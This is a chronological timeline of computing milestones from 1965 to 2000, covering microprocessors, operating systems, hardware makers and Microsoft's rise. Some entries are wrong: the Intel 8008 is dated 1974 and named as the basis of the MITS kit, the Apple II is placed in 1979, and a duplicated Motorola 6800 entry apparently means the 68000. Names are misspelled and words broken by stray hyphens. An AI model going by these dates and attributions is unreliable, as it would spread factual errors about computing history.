1965    BASIC (Beginners All-purpose Symbolic Instruction Code) was developed at Darth-mouth College. IBM produced the System/360, which used integrated circuits.
1968    Robert Noyce and Gordon Moore start-up the Intel Corporation.
1969    Intel began work on a device for Busicom, which would eventually become the first microprocessor.
1970    Xerox creates the Palo Alto Research Center (PARC), which would become one of the leading research centers of creative ideas in the computer industry. Intel release the first RAM chip (the 1103), which had a memory capacity of 1Kb (1024 bits). DEC re-leases the 16-bit PDP-11 (PDP-11/20) computer, which would eventually sell over 600,000 computers.
1971    Intel release the first microprocessor: the Intel 4004. Bill Gates and Paul Allen start work on a PDP-10 computer in their spare time. Ken Thompson, at Bell Laboratories, produces the first version of the UNIX operating system. Niklaus Wirth introduces the Pascal programming language.
1973    Xerox demonstrates a bit-mapped screen. IBM produces the first hard disk drive (an 8 inch diameter, and a storage of 70MB).
1974    Intel produces the first 8-bit microprocessor: the Intel 8008. Bill Gates and Paul Al-len start-up a company named Traf-O-Data. Xerox demonstrates Ethernet. MITS produces a kit computer, based on the Intel 8008. Xerox demonstrates WYSIWYG (What You See Is What You Get).  Motorola develops the 6800 microprocessor. Brian Kerighan and Dennis Ritchie produced the C programming language.
1975    MOS Technologies produces the 6502 microprocessor. Microsoft develops BASIC for the MITS computer.
1976    Zilog releases the Z80 processor. Digital Research copyrighted the CP/M operating system. Steve Wozniak and Steve Jobs develop the Apple I computer, and create the Apple Corporation. Texas Instruments produces the first 16-bit microprocessor: the TMS9900. Cray-1 supercomputer released, the first commercial supercomputer (150 million floating point operations per second).
1977    FORTRAN 77 introduced. DEC released their new 32-bit VAX computer range (VAX-11/780).
1978    Commodore released the Commodore PET. DEC release VMS Version 1.0 for their VAX range.
1979    Intel releases the 8086/8088 microprocessors. Zilog introduced the Z8000 micro-processor and Motorola releases the 6800 microprocessor. Apple introduced the Apple II computer, and Radio Shack releases the TRS-80 computer. VisiCalc and WordStar introduced.
1981    IBM releases the IBM PC, which is available with MS-DOS supplied by Microsoft and PC-DOS (IBM’s version).
1982    Compaq Corporation founded. Commodore releases the Vic-20 computer and Com-modore 64. Sinclair releases the ZX81 computer and the Sinclair Spectrum. TCP/IP communications protocol created. Intel releases the 80286, which is an improved 8088 processor.
WordPerfect 1.0 released.
1983    Compaq releases their first portable PC. Lotus 1-2-3 and WordPerfect released. Bjarn Stroustrup defines the C++ programming language. MS-DOS 2.0 and PC-DOS 2.0 released.
1984    Apple releases the Macintosh computer. MIT introduce the X-Windows user inter-face.
1985    Microsoft releases the first version of Microsoft Windows, and Intel releases the classic 80386 microprocessor. Adobe Systems define the PostScript standard which is used with the Apple LaserWriter. Philips and Sony introduce the CD-ROM. DEC re-lease MicroVAX II.
1986    Microsoft releases MS-DOS 3.0. Compaq release the Deskpro 386.
1987    Microsoft releases the second version of Microsoft Windows. IBM releases PS/2 range. Model 30 uses 8088 processor, Model 50 and Model 60 use 80286, and Model 80 uses 80386 processor. VGA standard also introduced. IBM and Microsoft release the first version of OS/2.
1988    MS-DOS 4.0 released.
1989    WWW (World Wide Web) created by Tim Bernes-Lee at CERN, European Particle Physics Laboratory in Switzerland. Intel develops the 80486 processor. Creative La-boratories release Sound Blaster card.
1990    Microsoft releases Microsoft Windows 3.0. DEC releases its two last members of its PDP family (MicroPDP-11/93 and PDP-11/94), after 20 years of sales.
1991    MS-DOS 5.0 released. Collaboration between IBM and Microsoft on DOS finishes.
1993    Intel introduces the Pentium processor (60MHz). Microsoft release Windows NT, Office 4.0 (Word 6.0, Excel 5.0 and PowerPoint 4.0) and MS-DOS 6.0 (which includes DoubleSpace, a disk compression program). IBM makes an annual loss of $8 billion.
1994    Netscape 1.0 released. Microsoft withdraws DoubleSpace in favor of DriveSpace (be-cause of successful legal action by Stac which claimed that parts of it were copies of its program: Stacker). MS-DOS 6.22 would be the final version of DOS.
1995    Microsoft release Windows 95 and Office 95. Intel releases the Pentium Pro, which has speeds of 150, 166, 180 and 200MHz (400MIPs). JavaScript developed by Netscape. IBM purchase Lotus Development Corp.
1996    Netscape Navigator 2.0 released (the first to support Java Script). Microsoft releases Windows 95 OSR 2.0, which fixed the bugs in the first release and adds USB and FAT 32 support.
1997    Intel release Pentium MMX. Microsoft release Office 97, which creates a virtual mo-nopoly in office application software for Microsoft. Office 97 is fully integrated and has enhanced version of Microsoft Word (upgraded from Word 6.0), Microsoft Excel (upgraded from Excel 5.0), Microsoft Access, Microsoft PowerPoint and Microsoft Outlook. IBM’s Deep Blue beats Gary Kasparov (the World Chess Champion) in a chess match. Intel releases the Pentium II processor (233, 266 and 300MHz ver-sions). Apple admits serious financial trouble. Microsoft purchases 100,000 non-voting shares for $150 million. One of the conditions is that Apple drops their long running court case with Microsoft for copying the Mac interface on Microsoft Win-dows (although Apple copied its interface from Xerox). Bill Gate’s fortune reaches $40 billion. He has thus, since 1975 (the year that Microsoft were founded), earned $500,000 per hour (assuming that he worked a 14 hour day), or $150 per second. IBM’s Deep Blue beat Garry Kasparov at chess.
1998    Microsoft releases Microsoft Windows 98. Legal problems arise for Microsoft, espe-cially as its new operating system includes several free programs as standard. The biggest problem is with Microsoft Internet Explorer, which is free compared to Netscape, which must be purchased.
1999    Linux Kernel 2.2.0 released, and heralded as the only real contender in the PC oper-ating market to Microsoft.     Intel releases Pentium III (basically a faster version of the Pentium II). Microsoft Office 2000 released. Bill Gates’ wealth reaches $100 bil-lion (in fact, $108 billion in September 1999).
2000     Millennium bug bites with false teeth.
and on    Microsoft release Windows NT Version 5/2000 in three versions: Workstation, Server and SMP Server (multiprocessor). It runs on DEC Alpha’s, Intel x86, Intel IA32, Intel IA64 and AMD K7 (which is similar to an Alpha). Microsoft releases Office 2000, but loses court case.